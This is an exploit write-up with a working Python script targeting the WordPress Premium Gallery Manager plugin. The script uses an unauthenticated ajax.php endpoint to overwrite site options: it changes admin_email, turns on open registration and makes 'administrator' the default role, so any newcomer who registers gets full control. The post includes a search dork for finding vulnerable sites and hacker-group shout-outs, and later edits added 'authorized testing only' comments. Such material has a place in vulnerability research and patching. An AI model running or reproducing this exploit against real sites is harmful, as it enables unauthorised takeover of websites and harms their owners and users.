# Exploit Title : WordPress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
# Author : Hannaichi [@dntkun]
# Date : February 5th, 2014
# Type : php, html, htm, asp, etc.
# Category : Web Applications
# Vulnerability : Unauthenticated Configuration Access
# Tested On : Windows 7 32-bit | Google Chrome
# Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
# Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
# POC : the POST below carries no session cookie, credentials or nonce;
#       the option panel's ajax.php "save" action is reached without any of them.
# Save File As Python (.py)
try:  # Python 2 module names (what this PoC was written against)
    import httplib
    import urllib
except ImportError:  # Python 3: same attributes under the new names
    import http.client as httplib
    import urllib.parse as urllib
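# target site
site = "victim"  # <--- no http:// or https://, just the host (and :port if needed)
# path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"


def _build_params(option_name, option_value):
    """Return the form-encoded body for one ``action=save`` request.

    ``ajax.php`` is fed a ``values[]`` array of name/value pairs; this
    encodes a single entry (index 0).  A fixed-order list is used instead
    of a dict so the body is byte-for-byte deterministic on every
    interpreter.

    Args:
        option_name: WordPress option name to overwrite (e.g. ``default_role``).
        option_value: Value to store for that option.

    Returns:
        The ``application/x-www-form-urlencoded`` request body as a str.
    """
    try:  # Python 2
        from urllib import urlencode
    except ImportError:  # Python 3
        from urllib.parse import urlencode
    return urlencode([
        ("action", "save"),
        ("values[0][name]", option_name),
        ("values[0][value]", option_value),
    ])


def ChangeOption(site, url, option_name, option_value, use_https=False, timeout=10):
    """POST one option change to the plugin's unauthenticated ``ajax.php``.

    The request carries only ``Content-type`` and ``Accept`` headers: no
    cookie, no credentials, no nonce.  A successful call rewrites a live
    WordPress option on the target, so only run this against a site you
    are authorized to test, and put the original values back afterwards.

    Args:
        site: Target host (and optional ``:port``), without a scheme.
        url: Path to ``ajax.php`` on that host.
        option_name: WordPress option name to overwrite.
        option_value: New value for the option.
        use_https: Use ``HTTPSConnection`` instead of ``HTTPConnection``.
            The original PoC only spoke plain HTTP, so that stays the
            default; it does mean the target host and the option values
            travel in clear text unless this is set.
        timeout: Socket timeout in seconds, so a silent target cannot
            hang the script (the original had none).

    Returns:
        ``(status, reason, body)`` where ``body`` is the response text
        decoded as UTF-8 (undecodable bytes replaced).  ``ajax.php``'s
        own success/failure format is not documented here, so inspect
        the body rather than assuming a 200 means the option changed.

    Raises:
        Whatever ``http.client``/``httplib`` raises on connection or
        socket errors; the connection is closed either way.
    """
    try:  # Python 2
        from httplib import HTTPConnection, HTTPSConnection
    except ImportError:  # Python 3
        from http.client import HTTPConnection, HTTPSConnection

    params = _build_params(option_name, option_value)
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    connection_class = HTTPSConnection if use_https else HTTPConnection
    conn = connection_class(site, timeout=timeout)
    try:
        conn.request("POST", url, params, headers)
        response = conn.getresponse()
        print(response.status, response.reason)
        data = response.read()
    finally:
        # Close on the error path too; the original leaked the socket
        # whenever request()/getresponse() raised.
        conn.close()
    body = data.decode("utf-8", "replace")
    print(body)
    return response.status, response.reason, body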
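# The three option changes from the original PoC, sent in its order:
#   1. admin_email        -> an address you control
#   2. users_can_register -> "1" (open self-registration)
#   3. default_role       -> "administrator" (every new account is an admin)
# Each call changes the target's live configuration through the
# unauthenticated endpoint; run this only against a site you are
# authorized to test, and restore all three values when you are done.
for option_name, option_value in (
    ("admin_email", "youremail@test.com"),
    ("users_can_register", "1"),
    ("default_role", "administrator"),
):
    ChangeOption(site, url, option_name, option_value)

# print() with a single argument behaves the same on Python 2 and 3;
# the original print statement was Python 2 only.
print("Now register a new user, they are an administrator by default!")
# Place It Broo No Lazy For This :D !!
# ----------------------------------------------------------------------------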
# Thanks to: AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*